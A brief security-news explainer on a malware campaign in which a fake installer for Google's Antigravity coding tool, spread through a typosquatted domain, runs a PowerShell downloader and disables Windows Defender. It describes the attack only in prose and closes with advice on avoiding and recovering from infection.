🎯Basically, a fake Google app is stealing your login info when you install it.
What Happened
A new malware campaign has emerged, targeting users searching for Google’s Antigravity coding tool. Unsuspecting victims are downloading a trojanized installer from a lookalike domain, believing they are getting the legitimate software. The malicious installer operates seamlessly, making it difficult for users to detect any wrongdoing.
How It Works
The fake installer, named Antigravity_v1.22.2.0.exe, is crafted to resemble the real Google application. However, it contains an additional step that executes a PowerShell script during installation. This script quietly connects to an external server, allowing attackers to control what happens next.
The malicious script drops two PowerShell files into the user's temporary folder. One of these files is designed to open a connection to the attacker's server and request further instructions. This method, known as a downloader cradle, allows attackers to change their payload without needing to modify the installer.
Signs of Infection
Victims may not notice anything unusual immediately. The application appears to function normally, and the only signs of infection occur in the background. The malware can disable Windows Defender's scanning capabilities, making it harder to detect.
How to Protect Yourself
To avoid falling victim to this type of malware, always ensure you download software from official websites. Check URLs carefully to avoid typosquatting domains. Additionally, consider using antivirus software that can detect and block malicious scripts. If you suspect you have installed this trojan, immediately run a full system scan and change your passwords for sensitive accounts.
🔒 Pro insight: This campaign highlights the effectiveness of typosquatting and downloader techniques in modern malware distribution.
